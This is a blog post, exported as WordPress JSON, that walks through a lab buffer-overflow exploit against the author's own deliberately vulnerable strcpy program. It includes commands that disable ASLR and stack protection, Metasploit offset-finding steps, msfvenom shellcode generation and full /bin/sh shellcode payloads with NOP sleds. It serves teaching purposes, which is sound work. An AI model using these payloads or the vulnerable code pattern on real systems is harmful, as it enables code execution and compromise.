{"id":1565,"date":"2020-09-16T14:58:18","date_gmt":"2020-09-16T12:58:18","guid":{"rendered":"https:\/\/blog.mhasin.eu\/?p=1565"},"modified":"2020-09-27T15:49:42","modified_gmt":"2020-09-27T13:49:42","slug":"buffer-overflow-exploit-1","status":"publish","type":"post","link":"https:\/\/blog.mhasin.eu\/?p=1565","title":{"rendered":"Buffer Overflow Exploit – 1"},"content":{"rendered":"\n

Install:<\/p>\n\n\n\n

apt install gdb gem\ngem install rex-text<\/code><\/pre>\n\n\n\n
Determina if ASLR is enabled. If it is \/proc\/sys\/kernel\/randomize_va_space > 0<\/p>\n\n\n\n
cat \/proc\/sys\/kernel\/randomize_va_space<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
We can disable it by setting this value to 0<\/p>\n\n\n\n
echo 0 > \/proc\/sys\/kernel\/randomize_va_space<\/code><\/pre>\n\n\n\n
Create program:<\/p>\n\n\n\n
vim bofl.cpp<\/code><\/pre>\n\n\n\n
#include \n\nint main(int argc, char **argv)\n{\n         char buf[500];\n         strcpy(buf, argv[1]);\n         return 0;\n}<\/code><\/pre>\n\n\n\n
Compile witch stack smashing protection disabled<\/p>\n\n\n\n
g++ bofl.cpp -fno-stack-protector -mpreferred-stack-boundary=4 -o bofl<\/code><\/pre>\n\n\n\n
Now lets see if we can cause the program to crash<\/p>\n\n\n\n
.\/bofl test<\/code><\/pre>\n\n\n\n
We can send large amounts of data through the command line using python<\/p>\n\n\n\n
.\/bofl `python -c 'print \"A\" * 400'`<\/code><\/pre>\n\n\n\n
This point we are essentially fuzz testing our program. However, sice our buffer has a 500 byte capacity, the program is behaving as expected<\/p>\n\n\n\n
.\/bofl `python -c 'print \"A\" * 500'`\n.\/bofl `python -c 'print \"A\" * 600'`<\/code><\/pre>\n\n\n\n
\"\"
Buffer overflow, signified by a segmentation fault<\/figcaption><\/figure>\n\n\n\n
Lets take a look under the hood and see whats happening<\/p>\n\n\n\n
gdb -q bofl\nrun `python -c 'print \"A\" * 600'`<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
When a segfault occurs, gdb wil display the intruction pointer eip 0x0000555555555173<\/p>\n\n\n\n
We can see that eip is pointing to a bogus memory address 0x0000555555555173<\/p>\n\n\n\n
info registers<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
0x41 is the ascii value for the latter A. <\/p>\n\n\n\n
Since we can overwrite EIP with arbitrary data, we are able to after the flow of execution. Theoreticaly we can divert execution to any address we went, as long as it exists in memory. This is archived by overwriting the current functions return address with an address of our choice. Lets digress and first determine how many bites it takes to successfuly overwrite the return address.<\/p>\n\n\n\n
The metasploit framework is jam packed with useful tools.<\/p>\n\n\n\n
cd \/opt\/metasploit-framework\/embedded\/framework\/tools\/exploit\/<\/code><\/pre>\n\n\n\n
pattern_create generates a string that we can use as input<\/p>\n\n\n\n
.\/pattern_create.rb -l 600<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
RUN:<\/p>\n\n\n\n
run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
We siply send the value of EIP to pattern_offset<\/p>\n\n\n\n
.\/pattern_offset.rb -q 72413971<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
So it takes 508 bytes to overwrite just up to the return address<\/p>\n\n\n\n
echo \"offset: 508\"<\/code><\/pre>\n\n\n\n
All we need now is a return address. But where should we have the program divert execution to?<\/p>\n\n\n\n
Howbount we make this bad boy execute our own subroutine that isnt hard coded into the program.<\/p>\n\n\n\n
How is this even possible? We can input executable code. First lets find the address where our input resides at.<\/p>\n\n\n\n
disassemble main<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
If we disassemble main we can see the call to strcpy. Lets set a breakpoint just after<\/p>\n\n\n\n
break *0x004011c7<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
run:<\/p>\n\n\n\n
run `python -c 'print \"A\" * 508 + \"BBBB\"'`<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
x\/16wx $esp<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
After strcpy we can see that the stack contains our input of 0x41<\/p>\n\n\n\n
If we look closer we can see that EAX holds our input address<\/p>\n\n\n\n
info registers<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Well use this as our return address<\/p>\n\n\n\n
cont<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Continuing we see that the offset is indeed 508 bytes ebp contains 0x41(A) and eip contains 0x42(B).<\/p>\n\n\n\n
To execute our code we cant just input RAW C code. The code has to be in its lowest form. This is called shellcode which consists of hex opcodes.<\/p>\n\n\n\n
Well execute the cmd \/bin\/sh which will give us a shell prompt (no wonder its called shellcode)<\/p>\n\n\n\n
cd \/opt\/metasploit-framework\/embedded\/framework<\/code><\/pre>\n\n\n\n
.\/msfvenom -a x86 --platform Linux -p linux\/x86\/exec CMD=\/bin\/sh -f C<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Notice the null bytes 0x00. This will cause our input string to terminate early. Were going to have to encode this shellcode. Typical, we want to avoid using any whitespace character (see asciitable.com) that may terminate our string<\/p>\n\n\n\n
<\/p>\n\n\n\n
run `python -c 'print \"\\41\" * 508  + \"\\x31\\xc9\\x31\\xdb\\xf7\\xe3\\xb0\\xa4\\xcd\\x80\\x6a\\x0b\\x58\\x99\\x52\" + \"\\x66\\x68\\x2d\\x63\\x89\\xe7\\x68\\x2f\\x73\\x68\\x00\\x68\\x2f\\x62\\x69\" + \"\\x6e\\x89\\xe3\\x52\\xe8\\x08\\x00\\x00\\x00\\x2f\\x62\\x69\\x6e\\x2f\\x73\" + \"\\x68\\x00\\x57\\x53\\x89\\xe1\\xcd\\x80\" + \"\\x90\" * 100 + \"\\x41\\x41\\x41\\x41\"'`<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
UBUNTU \u2013 14..4.03 X64<\/p>\n\n\n\n
Install package:<\/p>\n\n\n\n
apt install libc6-dev-i386 dpkg-dev gdb<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
echo 0 | sudo tee \/proc\/sys\/kernel\/randomize_va_space<\/code><\/pre>\n\n\n\n
Compille program:<\/p>\n\n\n\n
#include \n#include \n\nint main(int argc, char *argv[]){\n\tchar buf[256];\n\tstrcpy(buf, argv[1]);\n\tprintf(\"%s\\n\", buf);\n\treturn 0;\n}<\/code><\/pre>\n\n\n\n
gcc -o example -fno-stack-protector -m32 -z execstack example.c \n-fno-stack-protector<\/code><\/pre>\n\n\n\n
Run program gdb<\/p>\n\n\n\n
gdb .\/example<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
disassemble main<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
break *0x08048475<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
run $(python -c \u201eprint(\u201aA\u2019*256)\u201c)<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
x\/200xb $esp<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
In new GDB session<\/p>\n\n\n\n
$(python -c \"print('\\x90'*222+'\\x31\\xc0\\xb0\\x46\\x31\\xdb\\x31\\xc9\\xcd\\x80\\xeb\\x16\\x5b\\x31\\xc0\\x88\\x43\\x07\\x89\\x5b\\x08\\x89\\x43\\x0c\\xb0\\x0b\\x8d\\x4b\\x08\\x8d\\x53\\x0c\\xcd\\x80\\xe8\\xe5\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68'+'\\x30\\xd4\\xff\\xff')\")<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/p>\n
 \t
 \t\t \t\t\"\"<\/a> \t\t\u00a0\u00a0<\/span> \t\tSend article as PDF<\/span> \t\t\u00a0\u00a0<\/span> \t\t \t\t \t<\/form> <\/div>","protected":false},"excerpt":{"rendered":"Install: Determina if ASLR is enabled. If it is \/proc\/sys\/kernel\/randomize_va_space > 0 We can disable it by setting this value to 0 Create program: Compile witch stack smashing protection disabled Now lets see if we can cause the program to crash We can send large amounts of data through the command line using python This point we are essentially fuzz testing our program. However, sice our buffer has a 500 byte capacity, the program is…\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"arc_restricted_post":false,"footnotes":""},"categories":[18],"tags":[],"class_list":["post-1565","post","type-post","status-publish","format-standard","hentry","category-biaks"],"_links":{"self":[{"href":"https:\/\/blog.mhasin.eu\/index.php?rest_route=\/wp\/v2\/posts\/1565","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.mhasin.eu\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.mhasin.eu\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.mhasin.eu\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.mhasin.eu\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1565"}],"version-history":[{"count":14,"href":"https:\/\/blog.mhasin.eu\/index.php?rest_route=\/wp\/v2\/posts\/1565\/revisions"}],"predecessor-version":[{"id":1614,"href":"https:\/\/blog.mhasin.eu\/index.php?rest_route=\/wp\/v2\/posts\/1565\/revisions\/1614"}],"wp:attachment":[{"href":"https:\/\/blog.mhasin.eu\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1565"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.mhasin.eu\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1565"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.mhasin.eu\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1565"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}